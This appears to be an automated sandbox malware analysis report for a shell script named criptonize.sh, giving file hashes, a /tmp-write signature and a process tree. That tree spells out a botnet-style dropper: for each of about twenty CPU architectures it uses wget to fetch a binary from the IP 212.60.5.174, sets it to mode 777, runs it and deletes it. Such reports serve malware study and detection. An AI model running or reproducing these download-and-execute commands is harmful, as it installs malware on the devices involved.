Resubmissions
27-08-2024 23:50
240827-3vw9rsxdrg 827-08-2024 23:49
240827-3t1wkaxdpd 827-08-2024 23:47
240827-3svyxsxdlf 827-08-2024 23:45
240827-3rvlrsxdjc 3Analysis
-
max time kernel
59s -
max time network
61s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
27-08-2024 23:45
Static task
static1
Behavioral task
behavioral1
Sample
criptonize.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
criptonize.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
criptonize.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
criptonize.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
criptonize.sh
-
Size
9KB
-
MD5
fe5b1cae588f9ad418e162262b65b865
-
SHA1
c0ab765270f811bcdbb0ad9f4ed2871edcf58caf
-
SHA256
5231c1a078c018a6abea6fadde67300a961c9b528743464806246a3be619b405
-
SHA512
b9c079cbb03cc31ba0163dbfe3d9a8fda594010717f48d29880496e31b3852fb90423e6291b1697e09c52d72f6bd1f4405021aa63d652a0c96853fff25055774
-
SSDEEP
96:rK7IcSgf29gv+1XVYmm6Wdw9Iu8f/s2CIjTgSWuI:cERlnySeZy
Malware Config
Signatures
-
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/criptonize.sh4 wget File opened for modification /tmp/criptonize.arc700 wget File opened for modification /tmp/criptonize.armv7l wget File opened for modification /tmp/criptonize.powerpc wget File opened for modification /tmp/criptonize.aarch64 wget File opened for modification /tmp/criptonize.armv6l wget File opened for modification /tmp/criptonize.armv4l wget File opened for modification /tmp/criptonize.bsdamd64 wget File opened for modification /tmp/criptonize.i586 wget File opened for modification /tmp/criptonize.i486 wget File opened for modification /tmp/criptonize.armv5l wget File opened for modification /tmp/criptonize.armv4eb wget File opened for modification /tmp/criptonize.armv4tl wget File opened for modification /tmp/criptonize.mips64 wget File opened for modification /tmp/criptonize.m68k wget File opened for modification /tmp/criptonize.x86_64 wget File opened for modification /tmp/criptonize.i686 wget File opened for modification /tmp/criptonize.sparc wget File opened for modification /tmp/criptonize.mips wget File opened for modification /tmp/criptonize.mipsel wget
Processes
-
/tmp/criptonize.sh/tmp/criptonize.sh1⤵PID:722
-
/bin/rmrm -f criptonize.x86_642⤵PID:723
-
-
/usr/bin/wgetwget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_642⤵
- Writes file to tmp directory
PID:725
-
-
/bin/chmodchmod 777 criptonize.x86_642⤵PID:827
-
-
/tmp/criptonize.x86_64./criptonize.x86_64 x86_642⤵PID:828
-
-
/bin/rmrm -f criptonize.x86_642⤵PID:830
-
-
/bin/rmrm -f criptonize.i6862⤵PID:831
-
-
/usr/bin/wgetwget -O criptonize.i686 http://212.60.5.174/criptonize.i6862⤵
- Writes file to tmp directory
PID:832
-
-
/bin/chmodchmod 777 criptonize.i6862⤵PID:833
-
-
/tmp/criptonize.i686./criptonize.i686 i6862⤵PID:834
-
-
/bin/rmrm -f criptonize.i6862⤵PID:836
-
-
/bin/rmrm -f criptonize.i5862⤵PID:837
-
-
/usr/bin/wgetwget -O criptonize.i586 http://212.60.5.174/criptonize.i5862⤵
- Writes file to tmp directory
PID:838
-
-
/bin/chmodchmod 777 criptonize.i5862⤵PID:839
-
-
/tmp/criptonize.i586./criptonize.i586 i5862⤵PID:840
-
-
/bin/rmrm -f criptonize.i5862⤵PID:842
-
-
/bin/rmrm -f criptonize.i4862⤵PID:843
-
-
/usr/bin/wgetwget -O criptonize.i486 http://212.60.5.174/criptonize.i4862⤵
- Writes file to tmp directory
PID:844
-
-
/bin/chmodchmod 777 criptonize.i4862⤵PID:845
-
-
/tmp/criptonize.i486./criptonize.i486 i4862⤵PID:846
-
-
/bin/rmrm -f criptonize.i4862⤵PID:848
-
-
/bin/rmrm -f criptonize.aarch642⤵PID:849
-
-
/usr/bin/wgetwget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch642⤵
- Writes file to tmp directory
PID:850
-
-
/bin/chmodchmod 777 criptonize.aarch642⤵PID:851
-
-
/tmp/criptonize.aarch64./criptonize.aarch64 aarch642⤵PID:852
-
-
/bin/rmrm -f criptonize.aarch642⤵PID:854
-
-
/bin/rmrm -f criptonize.armv7l2⤵PID:855
-
-
/usr/bin/wgetwget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l2⤵
- Writes file to tmp directory
PID:856
-
-
/bin/chmodchmod 777 criptonize.armv7l2⤵PID:857
-
-
/tmp/criptonize.armv7l./criptonize.armv7l armv7l2⤵PID:858
-
-
/bin/rmrm -f criptonize.armv7l2⤵PID:860
-
-
/bin/rmrm -f criptonize.armv6l2⤵PID:861
-
-
/usr/bin/wgetwget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l2⤵
- Writes file to tmp directory
PID:862
-
-
/bin/chmodchmod 777 criptonize.armv6l2⤵PID:863
-
-
/tmp/criptonize.armv6l./criptonize.armv6l armv6l2⤵PID:864
-
-
/bin/rmrm -f criptonize.armv6l2⤵PID:866
-
-
/bin/rmrm -f criptonize.armv5l2⤵PID:867
-
-
/usr/bin/wgetwget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l2⤵
- Writes file to tmp directory
PID:868
-
-
/bin/chmodchmod 777 criptonize.armv5l2⤵PID:872
-
-
/tmp/criptonize.armv5l./criptonize.armv5l armv5l2⤵PID:873
-
-
/bin/rmrm -f criptonize.armv5l2⤵PID:875
-
-
/bin/rmrm -f criptonize.armv4eb2⤵PID:876
-
-
/usr/bin/wgetwget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb2⤵
- Writes file to tmp directory
PID:877
-
-
/bin/chmodchmod 777 criptonize.armv4eb2⤵PID:878
-
-
/tmp/criptonize.armv4eb./criptonize.armv4eb armv4eb2⤵PID:879
-
-
/bin/rmrm -f criptonize.armv4eb2⤵PID:881
-
-
/bin/rmrm -f criptonize.armv4tl2⤵PID:882
-
-
/usr/bin/wgetwget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl2⤵
- Writes file to tmp directory
PID:883
-
-
/bin/chmodchmod 777 criptonize.armv4tl2⤵PID:884
-
-
/tmp/criptonize.armv4tl./criptonize.armv4tl armv4tl2⤵PID:885
-
-
/bin/rmrm -f criptonize.armv4tl2⤵PID:887
-
-
/bin/rmrm -f criptonize.armv4l2⤵PID:888
-
-
/usr/bin/wgetwget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l2⤵
- Writes file to tmp directory
PID:889
-
-
/bin/chmodchmod 777 criptonize.armv4l2⤵PID:890
-
-
/tmp/criptonize.armv4l./criptonize.armv4l armv4l2⤵PID:891
-
-
/bin/rmrm -f criptonize.armv4l2⤵PID:893
-
-
/bin/rmrm -f criptonize.mips642⤵PID:894
-
-
/usr/bin/wgetwget -O criptonize.mips64 http://212.60.5.174/criptonize.mips642⤵
- Writes file to tmp directory
PID:895
-
-
/bin/chmodchmod 777 criptonize.mips642⤵PID:896
-
-
/tmp/criptonize.mips64./criptonize.mips64 mips642⤵PID:897
-
-
/bin/rmrm -f criptonize.mips642⤵PID:899
-
-
/bin/rmrm -f criptonize.mips2⤵PID:900
-
-
/usr/bin/wgetwget -O criptonize.mips http://212.60.5.174/criptonize.mips2⤵
- Writes file to tmp directory
PID:901
-
-
/bin/chmodchmod 777 criptonize.mips2⤵PID:902
-
-
/tmp/criptonize.mips./criptonize.mips mips2⤵PID:903
-
-
/bin/rmrm -f criptonize.mips2⤵PID:904
-
-
/bin/rmrm -f criptonize.mipsel2⤵PID:905
-
-
/usr/bin/wgetwget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel2⤵
- Writes file to tmp directory
PID:906
-
-
/bin/chmodchmod 777 criptonize.mipsel2⤵PID:907
-
-
/tmp/criptonize.mipsel./criptonize.mipsel mipsel2⤵PID:908
-
-
/bin/rmrm -f criptonize.mipsel2⤵PID:910
-
-
/bin/rmrm -f criptonize.powerpc2⤵PID:911
-
-
/usr/bin/wgetwget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc2⤵
- Writes file to tmp directory
PID:912
-
-
/bin/chmodchmod 777 criptonize.powerpc2⤵PID:913
-
-
/tmp/criptonize.powerpc./criptonize.powerpc powerpc2⤵PID:914
-
-
/bin/rmrm -f criptonize.powerpc2⤵PID:916
-
-
/bin/rmrm -f criptonize.m68k2⤵PID:917
-
-
/usr/bin/wgetwget -O criptonize.m68k http://212.60.5.174/criptonize.m68k2⤵
- Writes file to tmp directory
PID:918
-
-
/bin/chmodchmod 777 criptonize.m68k2⤵PID:919
-
-
/tmp/criptonize.m68k./criptonize.m68k m68k2⤵PID:920
-
-
/bin/rmrm -f criptonize.m68k2⤵PID:922
-
-
/bin/rmrm -f criptonize.sh42⤵PID:923
-
-
/usr/bin/wgetwget -O criptonize.sh4 http://212.60.5.174/criptonize.sh42⤵
- Writes file to tmp directory
PID:924
-
-
/bin/chmodchmod 777 criptonize.sh42⤵PID:925
-
-
/tmp/criptonize.sh4./criptonize.sh4 sh42⤵PID:926
-
-
/bin/rmrm -f criptonize.sh42⤵PID:928
-
-
/bin/rmrm -f criptonize.sparc2⤵PID:929
-
-
/usr/bin/wgetwget -O criptonize.sparc http://212.60.5.174/criptonize.sparc2⤵
- Writes file to tmp directory
PID:930
-
-
/bin/chmodchmod 777 criptonize.sparc2⤵PID:931
-
-
/tmp/criptonize.sparc./criptonize.sparc sparc2⤵PID:932
-
-
/bin/rmrm -f criptonize.sparc2⤵PID:934
-
-
/bin/rmrm -f criptonize.arc7002⤵PID:935
-
-
/usr/bin/wgetwget -O criptonize.arc700 http://212.60.5.174/criptonize.arc7002⤵
- Writes file to tmp directory
PID:936
-
-
/bin/chmodchmod 777 criptonize.arc7002⤵PID:937
-
-
/tmp/criptonize.arc700./criptonize.arc700 arc7002⤵PID:938
-
-
/bin/rmrm -f criptonize.arc7002⤵PID:940
-
-
/bin/rmrm -f criptonize.bsdamd642⤵PID:941
-
-
/usr/bin/wgetwget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd642⤵
- Writes file to tmp directory
PID:942
-
-
/bin/chmodchmod 777 criptonize.bsdamd642⤵PID:943
-
-
/tmp/criptonize.bsdamd64./criptonize.bsdamd64 bsdamd642⤵PID:944
-
-
/bin/rmrm -f criptonize.bsdamd642⤵PID:946
-